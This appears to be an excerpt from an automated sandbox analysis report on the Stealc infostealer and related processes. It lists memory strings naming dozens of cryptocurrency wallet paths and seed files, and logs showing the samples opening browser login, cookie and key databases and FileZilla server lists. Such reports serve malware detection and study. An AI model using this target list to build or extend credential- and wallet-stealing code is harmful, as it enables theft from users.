Source: stealc_default2.exe, 00000016.00000002.2262384371.0000000000A0C000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000016.00000002.2262384371.0000000000A0C000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000016.00000002.2262384371.0000000000A0C000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000016.00000002.2262384371.0000000000A0C000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000034AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\walletsLR
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000034AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.walletLR
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000034AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: qdC:\Users\user\AppData\Roaming\Binance
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000034AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\walletsLR
Source: stealc_default2.exe, 00000016.00000002.2262384371.0000000000A0C000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000034AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q&%localappdata%\Coinomi\Coinomi\walletsLR
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000034AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: stealc_default2.exe, 00000016.00000002.2262384371.0000000000A0C000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000016.00000002.2262384371.0000000000A0C000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 0000000E.00000002.2004782582.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore
Source: stealc_default2.exe, 00000016.00000002.2262384371.0000000000A0C000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.X

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\svchost015.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
